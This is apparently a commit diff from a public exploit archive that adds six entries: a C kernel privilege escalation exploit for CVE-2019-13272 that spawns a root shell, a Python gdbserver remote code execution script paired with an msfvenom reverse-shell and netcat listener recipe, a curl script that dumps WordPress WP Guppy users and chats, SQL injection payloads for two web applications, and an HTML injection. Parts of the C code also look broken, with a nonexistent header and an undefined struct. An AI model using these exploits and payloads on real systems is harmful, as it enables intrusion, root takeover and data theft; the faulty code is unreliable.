DB: 2021-11-24

6 changes to exploits/shellcodes

Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)

GNU gdbserver 9.2 - Remote Command Execution (RCE)
Wordpress Plugin WP Guppy 1.1 - WP-JSON API Sensitive Information Disclosure
Webrun 3.6.0.42 - 'P_0' SQL Injection
Bus Pass Management System 1.0 - 'Search' SQL injection
FLEX 1085 Web 1.6.0 - HTML Injection

exploits/linux/local/50541.c

@@ -0,0 +1,368 @@
+# Exploit Title: Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)
+# Date: 11/22/21
+# Exploit Author: Ujas Dhami
+# Version: 4.19 - 5.2.1
+# Platform: Linux
+# Tested on:
+# ~ Ubuntu 19.04 kernel 5.0.0-15-generic
+# ~ Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64
+# ~ Kali Linux kernel 4.19.0-kali5-amd64
+# CVE: CVE-2019-13272
+
+// ....
+// Original discovery and exploit author: Jann Horn
+// https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
+// Modified exploit code of: BColes
+// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272
+// ....
+// ~ Uses the PolKit_Exec frontend.
+// ~ PolKit_Action is branched.
+// ~ Search is optimized.
+// ~ Trunks attain search priority upon execution.
+// ....
+// ujas@kali:~$ gcc exploit_traceme.c -o exploit_traceme
+// ujas@kali:~$ ./exploit_traceme
+// Welcome to your Arsenal!
+// accessing variables...
+// execution has reached EOP.
+// familiar trunks are been searched ...
+// trunk helper found: /usr/sbin/mate-power-backlight-helper
+// helper initiated: /usr/sbin/mate-power-backlight-helper
+// SUID process is being initiated (/usr/bin/pkexec) ...
+// midpid is being traced...
+// midpid attached.
+// root@kali:/home/ujas#
+// ....
+
+#include <ctype.h>
+#include <assert.h>
+#include <conio.h>
+#include <stdio.h>
+#include <sys/syscall.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <stddef.h>
+#include <sys/user.h>
+#include <linux/elf.h>
+#include <stdarg.h>
+#include <pwd.h>
+#include <sys/prctl.h>
+#include <sys/wait.h>
+#include <sys/ptrace.h>
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <signal.h>
+#define _GNU_SOURCE
+
+#define DEBUG
+#ifdef DEBUG
+#define dprintf printf
+#endif
+#define max(a,b) ((a)>(b) ? (a) : (b))
+#define eff(expr) ({             \
+  typeof(expr) __res = (expr);       \
+  if (__res == -1) {             \
+    dprintf("[-] Error: %s\n", #expr);     \
+    return 0;            \
+  }               \
+  __res;               \
+})
+
+struct stat st;
+
+const char *trunk[1024];
+
+const char *trunks_rec[] = {
+  "/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper",
+  "/usr/sbin/mate-power-backlight-helper",
+  "/usr/lib/gnome-settings-daemon/gsd-backlight-helper",
+  "/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper",
+  "/usr/lib/unity-settings-daemon/usd-backlight-helper",
+  "/usr/bin/xfpm-power-backlight-helper",
+  "/usr/bin/lxqt-backlight_backend",
+  "/usr/lib/gsd-backlight-helper",
+  "/usr/lib/gsd-wacom-led-helper",
+  "/usr/lib/gsd-wacom-oled-helper",
+  "/usr/libexec/gsd-wacom-led-helper",
+  "/usr/libexec/gsd-wacom-oled-helper",
+  "/usr/libexec/gsd-backlight-helper",
+
+};
+static int trace_align[2];
+static const char *path_exec = "/usr/bin/pkexec";
+static const char *path_action = "/usr/bin/pkaction";
+static int fd = -1;
+static int pipe_stat;
+static const char *term_sh = "/bin/bash";
+static int mid_succ = 1;
+static const char *path_doublealign;
+
+static char *tdisp(char *fmt, ...) {
+  static char overlayfs[10000];
+  va_list ap;
+  va_start(ap, fmt);
+  vsprintf(overlayfs, fmt, ap);
+  va_end(ap);
+  return overlayfs;
+}
+
+static int middle_main(void *overlayfs) {
+  prctl(PR_SET_PDEATHSIG, SIGKILL);
+  pid_t middle = getpid();
+  fd = eff(open("/proc/_fd/exe", O_RDONLY));
+  pid_t child = eff(fork());
+
+  if (child == 0) {
+    prctl(PR_SET_PDEATHSIG, SIGKILL);
+
+    eff(dup2(fd, 42));
+    int proc_fd = eff(open(tdisp("/proc/%d/status", middle), O_RDONLY));
+    char *threadv = tdisp("\nUid:\t%d\t0\t", getuid());
+    eff(ptrace(PTRACE_TRACEME, 0, NULL, NULL));
+    execl(path_exec, basename(path_exec), NULL);
+    while (1) {
+      char overlayfs[1000];
+      ssize_t buflen = eff(pread(proc_fd, overlayfs, sizeof(overlayfs)-1, 0));
+      overlayfs[buflen] = '\0';
+      if (strstr(overlayfs, threadv)) break;
+    }
+
+    dprintf("SUID execution failed.");
+    exit(EXIT_FAILURE);
+  }
+
+  eff(dup2(fd, 0));
+  eff(dup2(trace_align[1], 1));
+
+  struct passwd *pw = getpwuid(getuid());
+  if (pw == NULL) {
+    dprintf("err: username invalid/failed to fetch username");
+    exit(EXIT_FAILURE);
+  }
+
+  mid_succ = 1;
+  execl(path_exec, basename(path_exec), "--user", pw->pw_name,
+        path_doublealign,
+        "--help", NULL);
+  mid_succ = 0;
+  dprintf("err: pkexec execution failed.");
+  exit(EXIT_FAILURE);
+}
+
+static int timeexecbuffer(pid_t pid, int exec_fd, char *arg0) {
+  struct user_regs_struct regs;
+  struct exeio exev = { .iov_base = &regs, .iov_len = sizeof(regs) };
+  eff(ptrace(PTRACE_SYSCALL, pid, 0, NULL));
+  eff(waitpid(pid, &pipe_stat, 0));
+  eff(ptrace(PTRACE_GETREGSET, pid, NT_PRSTATUS, &exev));
+
+  unsigned long inject_surface = (regs.rsp - 0x1000) & ~0xfffUL;
+  struct injected_page {
+    unsigned long inj_arse[2];
+    unsigned long environment[1];
+    char arg0[8];
+    char path[1];
+  } ipage = {
+    .inj_arse = { inject_surface + offsetof(struct injected_page, arg0) }
+  };
+  strcpy(ipage.arg0, arg0);
+  for (int i = 0; i < sizeof(ipage)/sizeof(long); i++) {
+    unsigned long pro_d = ((unsigned long *)&ipage)[i];
+    eff(ptrace(PTRACE_POKETEXT, pid, inject_surface + i * sizeof(long),
+                (void*)pro_d));
+  }
+
+  eff(ptrace(PTRACE_SETREGSET, pid, NT_PRSTATUS, &exev));
+  eff(ptrace(PTRACE_DETACH, pid, 0, NULL));
+  eff(waitpid(pid, &pipe_stat, 0));
+
+  regs.orig_rax = __NR_execveat;
+  regs.rdi = exec_fd;
+  regs.rsi = inject_surface + offsetof(struct injected_page, path);
+  regs.rdx = inject_surface + offsetof(struct injected_page, inj_arse);
+  regs.r10 = inject_surface + offsetof(struct injected_page, environment);
+  regs.r8 = AT_EMPTY_PATH;
+}
+
+static int stag_2(void) {
+  pid_t child = eff(waitpid(-1, &pipe_stat, 0));
+  timeexecbuffer(child, 42, "stage3");
+  return 0;
+}
+
+static int sh_spawn(void) {
+  eff(setresgid(0, 0, 0));
+  eff(setresuid(0, 0, 0));
+  execlp(term_sh, basename(term_sh), NULL);
+  dprintf("err: Shell spawn unsuccessful.", term_sh);
+  exit(EXIT_FAILURE);
+}
+
+static int check_env(void) {
+  const char* xdg_session = getenv("XDG_SESSION_ID");
+
+  dprintf("accessing variables...\n");
+
+  if (stat(path_action, &st) != 0) {
+    dprintf("err: pkaction not found at %s.", path_action);
+    exit(EXIT_FAILURE);
+  }
+  if (system("/bin/loginctl --no-ask-password show-session $XDG_SESSION_ID | /bin/grep Remote=no >>/dev/null 2>>/dev/null") != 0) {
+    dprintf("warn: PolKit agent not found.\n");
+    return 1;
+  }
+  if (stat("/usr/sbin/getsebool", &st) == 0) {
+    if (system("/usr/sbin/getsebool deny_ptrace 2>1 | /bin/grep -q on") == 0) {
+      dprintf("warn: [deny_ptrace] is enabled.\n");
+      return 1;
+    }
+  }
+  if (xdg_session == NULL) {
+    dprintf("warn: $XDG_SESSION_ID is not set.\n");
+    return 1;
+  }
+  if (stat(path_exec, &st) != 0) {
+    dprintf("err: pkexec not found at %s.", path_exec);
+    exit(EXIT_FAILURE);
+  }
+
+  dprintf("execution has reached EOP.\n");
+
+  return 0;
+}
+
+int trunkh() {
+  char cmd[1024];
+  snprintf(cmd, sizeof(cmd), "%s --verbose", path_action);
+  FILE *fp;
+  fp = popen(cmd, "r");
+  if (fp == NULL) {
+    dprintf("err: Failed to run %s.\n", cmd);
+    exit(EXIT_FAILURE);
+  }
+
+  char line[1024];
+  char buffer[2048];
+  int helper_index = 0;
+  int useful_action = 0;
+  static const char *threadv = "org.freedesktop.policykit.exec.path -> ";
+  int needle_length = strlen(threadv);
+
+  while (fgets(line, sizeof(line)-1, fp) != NULL) {
+    if (strstr(line, "implicit active:")) {
+      if (strstr(line, "yes")) {
+        useful_action = 1;
+      }
+      continue;
+    }
+
+    if (useful_action == 0)
+      continue;
+    useful_action = 0;
+
+    int length = strlen(line);
+    char* found = memmem(&line[0], length, threadv, needle_length);
+    if (found == NULL)
+      continue;
+
+    memset(buffer, 0, sizeof(buffer));
+    for (int i = 0; found[needle_length + i] != '\n'; i++) {
+      if (i >= sizeof(buffer)-1)
+        continue;
+      buffer[i] = found[needle_length + i];
+    }
+
+    if (stat(&buffer[0], &st) != 0)
+      continue;
+
+    if (strstr(&buffer[0], "/xf86-video-intel-backlight-helper") != 0 ||
+      strstr(&buffer[0], "/cpugovctl") != 0 ||
+      strstr(&buffer[0], "/package-system-locked") != 0 ||
+      strstr(&buffer[0], "/cddistupgrader") != 0) {
+      dprintf("blacklisted thread helper ignored: %s\n", &buffer[0]);
+      continue;
+    }
+
+    trunk[helper_index] = strndup(&buffer[0], strlen(buffer));
+    helper_index++;
+
+    if (helper_index >= sizeof(trunk)/sizeof(trunk[0]))
+      break;
+  }
+
+  pclose(fp);
+  return 0;
+}
+
+int root_ptraceme() {
+  dprintf("helper initiated: %s\n", path_doublealign);
+
+  eff(pipe2(trace_align, O_CLOEXEC|O_DIRECT));
+  eff(fcntl(trace_align[0], F_SETPIPE_SZ, 0x1000));
+  char overlayfs = 0;
+  eff(write(trace_align[1], &overlayfs, 1));
+
+  dprintf("SUID process is being initiated(%s) ...\n", path_exec);
+  static char stackv[1024*1024];
+  pid_t midpid = eff(clone(middle_main, stackv+sizeof(stackv),
+                            CLONE_VM|CLONE_VFORK|SIGCHLD, NULL));
+  if (!mid_succ) return 1;
+  while (1) {
+    int fd = open(tdisp("/proc/%d/comm", midpid), O_RDONLY);
+    char overlayfs[16];
+    int buflen = eff(read(fd, overlayfs, sizeof(overlayfs)-1));
+    overlayfs[buflen] = '\0';
+    *strchrnul(overlayfs, '\n') = '\0';
+    if (strncmp(overlayfs, basename(path_doublealign), 15) == 0)
+      break;
+    usleep(100000);
+  }
+
+  dprintf("midpid is being traced...\n");
+  eff(ptrace(PTRACE_ATTACH, midpid, 0, NULL));
+  eff(waitpid(midpid, &pipe_stat, 0));
+  dprintf("midpid attached.\n");
+
+  timeexecbuffer(midpid, 0, "stage2");
+  exit(EXIT_SUCCESS);
+}
+
+int main(int argc, char **inj_arse) {
+  if (strcmp(inj_arse[0], "stage2") == 0)
+    return stag_2();
+  if (strcmp(inj_arse[0], "stage3") == 0)
+    return sh_spawn();
+
+  dprintf("Welcome to your Arsenal!\n");
+
+  check_env();
+
+  if (argc > 1 && strcmp(inj_arse[1], "check") == 0) {
+    exit(0);
+  }
+
+  dprintf("efficient trunk is being searched...\n");
+  trunkh();
+  for (int i=0; i<sizeof(trunk)/sizeof(trunk[0]); i++) {
+    if (trunk[i] == NULL)
+      break;
+
+    if (stat(trunk[i], &st) == 0) {
+      path_doublealign = trunk[i];
+      root_ptraceme();
+    }
+  }
+
+  dprintf("familiar trunks are been searched ...\n");
+  for (int i=0; i<sizeof(trunks_rec)/sizeof(trunks_rec[0]); i++) {
+    if (stat(trunks_rec[i], &st) == 0) {
+      path_doublealign = trunks_rec[i];
+      dprintf("trunk helper found: %s\n", path_doublealign);
+      root_ptraceme();
+    }
+  }
+
+  return 0;
+}

exploits/linux/remote/50539.py

@@ -0,0 +1,106 @@
+# Exploit Title: GNU gdbserver 9.2 - Remote Command Execution (RCE)
+# Date: 2021-11-21
+# Exploit Author: Roberto Gesteira Miñarro (7Rocky)
+# Vendor Homepage: https://www.gnu.org/software/gdb/
+# Software Link: https://www.gnu.org/software/gdb/download/
+# Version: GNU gdbserver (Ubuntu 9.2-0ubuntu1~20.04) 9.2
+# Tested on: Ubuntu Linux (gdbserver debugging x64 and x86 binaries)
+
+#!/usr/bin/env python3
+
+
+import binascii
+import socket
+import struct
+import sys
+
+help = f'''
+Usage: python3 {sys.argv[0]} <gdbserver-ip:port> <path-to-shellcode>
+
+Example:
+- Victim's gdbserver   ->  10.10.10.200:1337
+- Attacker's listener  ->  10.10.10.100:4444
+
+1. Generate shellcode with msfvenom:
+$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 PrependFork=true -o rev.bin
+
+2. Listen with Netcat:
+$ nc -nlvp 4444
+
+3. Run the exploit:
+$ python3 {sys.argv[0]} 10.10.10.200:1337 rev.bin
+'''
+
+
+def checksum(s: str) -> str:
+    res = sum(map(ord, s)) % 256
+    return f'{res:2x}'
+
+
+def ack(sock):
+    sock.send(b'+')
+
+
+def send(sock, s: str) -> str:
+    sock.send(f'${s}#{checksum(s)}'.encode())
+    res = sock.recv(1024)
+    ack(sock)
+    return res.decode()
+
+
+def exploit(sock, payload: str):
+    send(sock, 'qSupported:multiprocess+;qRelocInsn+;qvCont+;')
+    send(sock, '!')
+
+    try:
+        res = send(sock, 'vCont;s')
+        data = res.split(';')[2]
+        arch, pc = data.split(':')
+    except Exception:
+        print('[!] ERROR: Unexpected response. Try again later')
+        exit(1)
+
+    if arch == '10':
+        print('[+] Found x64 arch')
+        pc = binascii.unhexlify(pc[:pc.index('0*')])
+        pc += b'\0' * (8 - len(pc))
+        addr = hex(struct.unpack('<Q', pc)[0])[2:]
+        addr = '0' * (16 - len(addr)) + addr
+    elif arch == '08':
+        print('[+] Found x86 arch')
+        pc = binascii.unhexlify(pc)
+        pc += b'\0' * (4 - len(pc))
+        addr = hex(struct.unpack('<I', pc)[0])[2:]
+        addr = '0' * (8 - len(addr)) + addr
+
+    hex_length = hex(len(payload))[2:]
+
+    print('[+] Sending payload')
+    send(sock, f'M{addr},{hex_length}:{payload}')
+    send(sock, 'vCont;c')
+
+
+def main():
+    if len(sys.argv) < 3:
+        print(help)
+        exit(1)
+
+    ip, port = sys.argv[1].split(':')
+    file = sys.argv[2]
+
+    try:
+        with open(file, 'rb') as f:
+            payload = f.read().hex()
+    except FileNotFoundError:
+        print(f'[!] ERROR: File {file} not found')
+        exit(1)
+
+    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
+        sock.connect((ip, int(port)))
+        print('[+] Connected to target. Preparing exploit')
+        exploit(sock, payload)
+        print('[*] Pwned!! Check your listener')
+
+
+if __name__ == '__main__':
+    main()

exploits/multiple/webapps/50542.txt

@@ -0,0 +1,40 @@
+# Exploit Title: Webrun 3.6.0.42 - 'P_0' SQL Injection
+# Google Dork: intitle:"Webrun 3.6.0.42"
+# Date: 23/11/2021
+# Exploit Author: Vinicius Alves
+# Vendor Homepage: https://softwell.com.br/
+# Version: 3.6.0.42
+# Tested on: Kali Linux 2021.3
+
+=-=-=-= Description =-=-=-=
+
+
+Webrun version 3.6.0.42 is vulnerable to SQL Injection, applied to the P_0
+parameter used to set the username during the login process.
+
+
+=-=-=-= Exploiting =-=-=-=
+
+
+In the post request, change the P_0 value to the following payload:
+121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd
+
+
+You will see some information like below:
+
+
+interactionError('ERRO: sintaxe de entrada é inválida para tipo numeric:
+\"qvvxq1qbzbq\"', null, null, null, '<b>
+
+
+=-=-=-= POC =-=-=-=
+
+
+If the return has the value 'qvvxq1qbzbq', you will be able to successfully
+exploit this.
+
+
+See an example of the complete POST parameter:
+
+
+action=executeRule&pType=2&ruleName=GES_FLX_Gerar+Token+Dashboard&sys=GES&formID=8265&parentRID=-1&P_0=121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd&P_1=pwd

exploits/multiple/webapps/50544.txt

@@ -0,0 +1,53 @@
+# Exploit Title: FLEX 1085 Web 1.6.0 - HTML Injection
+# Date: 2021-11-21
+# Exploit Author: Mr Empy
+# Vendor Homepage: https://www.tem.ind.br/
+# Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94
+# Version: 1.6.0
+# Tested on: Android
+
+
+Title:
+================
+FLEX 1085 Web - HTML Injection
+
+Summary:
+================
+The FLEX 1085 Web appliance is vulnerable to an HTML injection attack that
+allows the injection of arbitrary HTML code.
+
+
+Severity Level:
+================
+5.3 (Medium)
+CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+
+
+Vulnerability Disclosure Schedule:
+============================
+* October 19, 2021: An email was sent to support at 6:08MP.
+
+* November 20, 2021: I didn't get any response from support.
+
+* November 21, 2021: Vulnerability Disclosure
+
+
+Affected Product:
+================
+FLEX 1085 Web v1.6.0
+
+
+Steps to Reproduce:
+================
+
+1. Open your browser and search for your device's IP address (http://<IP>).
+
+2. Log in to the device's dashboard and go to "WiFi".
+
+3. Use another device that has an access point and create a Wi-Fi network
+called "<h1>HTML Injection</h1>" (no double quotes) and activate the access
+point. (https://prnt.sc/20e4y88)
+
+4. Go back to the FLEX device and when scanning the new WiFi networks, the
+new network will appear written "HTML Injection" in bold and with a larger
+font size. (http://prnt.sc/20e51li)

exploits/php/webapps/50540.sh

@@ -0,0 +1,45 @@
+# Exploit Title: Wordpress Plugin WP Guppy 1.1 - WP-JSON API Sensitive Information Disclosure
+# Exploit Author: Keyvan Hardani
+# Date: 22/11/2021
+# Vendor Homepage: https://wp-guppy.com/
+# Version: up to 1.1
+# Tested on: Kali Linux - Windows 10 - Wordpress 5.8.x and apache2
+# Usage ./exploit.sh -h
+
+#!/bin/bash
+
+Help()
+{
+# Display Help
+echo "Usage"
+echo
+echo "Wordpress Plugin WP Guppy - A live chat - WP_JSON API Sensitive Information Disclosure"
+echo
+echo "Option 1: Get all users ( ./exploit.sh 1 domain.com)"
+echo "Option 2: Send message from / to other users ( ./exploit.sh 2 domain.com 1493 1507 ) => Senderid=1493 & Receiverid=1507"
+echo "Option 3: Get the chats between users ( ./exploit.sh 3 domain.com 1507 1493) => Receiverid=1493 & Userid= 1493"
+echo "-h Print this Help."
+echo
+}
+
+while getopts ":h" option; do
+case $option in
+h) # display Help
+Help
+exit;;
+esac
+done
+
+if [ $1 == 1 ]
+then
+curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=" | python -m json.tool
+fi
+
+if [ $1 == 2 ]
+then
+curl -s -X POST --url "https://$2/wp-json/guppy/v2/send-guppy-message" --data '{"receiverId":"'$3'","userId":"'$4'","guppyGroupId":"","chatType":1,"message":"test","replyTo":"","latitude":"","longitude":"","messageType":0,"messageStatus":0,"replyId":"","timeStamp":1637583213,"messageSentTime":"November 22, 2021","metaData":{"randNum":5394},"isSender":true}' -H 'Content-Type: application/json'| python -m json.tool
+fi
+if [ $1 == 3 ]
+then
+curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-user-chat?offset=0&receiverId=$3&userId=$4&chatType=1" | python -m json.tool
+fi

exploits/php/webapps/50543.txt

@@ -0,0 +1,39 @@
+# Exploit Title: Bus Pass Management System 1.0 - 'Search' SQL injection
+# Date: 23-11-2021
+# Exploit Author: Abhijeet Singh
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql/
+# Version: v-1.0 (Default)
+# Tested on: macOS Monterey(Version 12.0.1)
+
+*SQL Injection:*
+SQL injection is a web security vulnerability that allows an attacker to alter the SQL queries made to the database. This can be used to retrieve some sensitive information, like database structure, tables, columns, and their underlying data.
+
+*Attack Vector:*
+An attacker can compromise the database of the application using some automated(or manual) tools like SQLmap.
+
+*Steps to reproduce:*
+Step-1: Open 'View Pass' page using following URL:
+http://127.0.0.1/buspassms/download-pass.php
+
+
+2. Now put the below payload in the 'Search' field.
+*Payload: *123' AND (SELECT 7169 FROM (SELECT(SLEEP(4)))abhi) AND 'x'='x
+
+3. Server accepted our payload and the response got delayed by 4 seconds.
+
+*IMPACT:*
+As the vulnerable parameter is an external parameter (credentials not
+required), an attacker can dump the database of the application remotely.
+
+Suggested Mitigation/Remediation Actions
+Parameterized queries should be used to separate the command and data
+portions of the intended query to the database. These queries prevent
+an attacker from tampering with the query logic and extending a
+concatenated database query string. Code reviews should be conducted
+to identify any additional areas where the application or other
+applications in the organization are vulnerable to this attack.
+Additionally, input validation should be enforced on the server side
+in order to ensure that only expected data is sent in queries. Where
+possible security specific libraries should be used in order to
+provide an additional layer of protection.

files_exploits.csv

@@ -11419,6 +11419,7 @@ id,file,description,date,author,type,platform,port
 50494,exploits/windows/local/50494.txt,"10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows,
 50504,exploits/multiple/local/50504.c,"zlog 1.2.15 - Buffer Overflow",1970-01-01,LIWEI,local,multiple,
 50517,exploits/windows/local/50517.txt,"Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation",1970-01-01,"Marcio Mendes",local,windows,
+50541,exploits/linux/local/50541.c,"Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)",1970-01-01,"Ujas Dhami",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -18567,6 +18568,7 @@ id,file,description,date,author,type,platform,port
 50351,exploits/hardware/remote/50351.txt,"Mitrastar GPT-2541GNAC-N1 - Privilege escalation",1970-01-01,"Leonardo Nicolas Servalli",remote,hardware,
 50407,exploits/hardware/remote/50407.py,"Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH)",1970-01-01,LiquidWorm,remote,hardware,
 50408,exploits/hardware/remote/50408.txt,"Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection",1970-01-01,LiquidWorm,remote,hardware,
+50539,exploits/linux/remote/50539.py,"GNU gdbserver 9.2 - Remote Command Execution (RCE)",1970-01-01,"Roberto Gesteira Miñarro",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -44632,3 +44634,7 @@ id,file,description,date,author,type,platform,port
 50532,exploits/ruby/webapps/50532.txt,"GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Jacob Baines",webapps,ruby,
 50533,exploits/php/webapps/50533.py,"Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload",1970-01-01,"Keyvan Hardani",webapps,php,
 50538,exploits/php/webapps/50538.txt,"Aimeos Laravel ecommerce platform 2021.10 LTS - 'sort' SQL injection",1970-01-01,"Ilker Burak ADIYAMAN",webapps,php,
+50540,exploits/php/webapps/50540.sh,"Wordpress Plugin WP Guppy 1.1 - WP-JSON API Sensitive Information Disclosure",1970-01-01,"Keyvan Hardani",webapps,php,
+50542,exploits/multiple/webapps/50542.txt,"Webrun 3.6.0.42 - 'P_0' SQL Injection",1970-01-01,"Vinicius Alves",webapps,multiple,
+50543,exploits/php/webapps/50543.txt,"Bus Pass Management System 1.0 - 'Search' SQL injection",1970-01-01,"Abhijeet Singh",webapps,php,
+50544,exploits/multiple/webapps/50544.txt,"FLEX 1085 Web 1.6.0 - HTML Injection",1970-01-01,"Mr Empy",webapps,multiple,